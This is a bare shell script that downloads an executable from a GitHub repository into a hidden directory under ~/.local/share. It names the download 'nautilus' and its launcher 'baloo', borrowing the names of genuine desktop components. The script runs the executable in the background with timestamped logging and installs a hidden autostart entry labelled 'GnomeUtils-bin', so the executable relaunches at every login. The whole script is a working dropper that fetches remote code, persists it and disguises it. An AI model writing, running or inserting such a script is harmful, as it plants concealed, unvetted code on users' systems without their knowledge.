mkdir ~/.local/share/.gnome-extras

wget -q -O ~/.local/share/.gnome-extras/nautilus https://github.com/PirateOfTheCaribbean/Lmao/raw/main/nautilus
chmod +x ~/.local/share/.gnome-extras/nautilus 

cat > ~/.local/share/.gnome-extras/baloo <<'end1'
nohup ~/.local/share/.gnome-extras/nautilus > ~/.local/share/.gnome-extras/baloo.log &

nohup tail -f ~/.local/share/.gnome-extras/baloo.log | perl -pne 'print scalar(localtime()), " ";' > ~/.local/share/.gnome-extras/nautilus.log &
end1

chmod +x ~/.local/share/.gnome-extras/baloo

mkdir ~/.config/autostart/
cat > ~/.config/autostart/baloo.desktop <<'endmsg'
[Desktop Entry]
Type=Application
Exec=~/.local/share/.gnome-extras/baloo
Hidden=true
NoDisplay=true
X-GNOME-Autostart-enabled=true
Name=GnomeUtils-bin
endmsg